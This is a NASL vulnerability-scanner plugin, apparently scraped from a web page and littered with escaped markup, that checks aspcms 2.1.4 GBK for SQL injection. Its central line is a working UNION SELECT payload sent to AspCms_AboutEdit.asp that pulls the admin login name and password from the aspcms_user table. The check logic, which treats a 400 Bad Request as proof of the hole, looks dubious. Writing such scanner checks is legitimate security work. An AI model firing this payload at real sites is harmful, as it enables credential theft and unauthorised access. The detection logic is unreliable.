#
\n# NASL, Inc.
\n#<\/p>\n
include(“compat.inc”);
\nif(description)
\n{
\nscript_id(90029);
\nscript_version(“$Revision: 1.0 $”);
\nname[“english”] = “check aspcms2.1.4GBK SQL Injection security hole”;
\nscript_name(english:name[“english”]);<\/p>\n
desc[“english”] = “check aspcms2.1.4GBK SQL Injection security hole”;
\nscript_description(english:desc[“english”]);<\/p>\n
script_summary(english:”john”);<\/p>\n
script_category(ACT_GATHER_INFO);<\/p>\n
script_copyright(english:”This script is Copyright (C) 2011 by john”);
\nfamily[“english”] = “goingdown john”;
\nscript_family(english:family[“english”]);
\nscript_dependencie(“find_service1.nasl”,”http_version.nasl”);
\nscript_require_ports(“Services\/www”, 80);
\nexit(0);
\n}
\ninclude(“global_settings.inc”);
\ninclude(“misc_func.inc”);
\ninclude(“http.inc”);
\nstr1=”\/admin\/_content\/_About\/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1″;
\nr1=http_send_recv3(method: “GET”, item:str1, port: 80);
\ndisplay(r1);
\ndisplay(r1[2]);
\nif( r1 == NULL )
\n{
\nreturn(0);
\n}
\nif(“HTTP\/1.1 400 Bad Request”>!<string(r1))
\n{
\nreturn(0);
\n}
\nif(“HTTP Error 400. The request is badly formed.”>!<string(r1[2]))
\n{
\nreturn(0);
\n}
\nelse
\n{
\nsecurity_hole(port);
\n}<\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
# # NASL, Inc. # include(“compat.i …<\/p>\n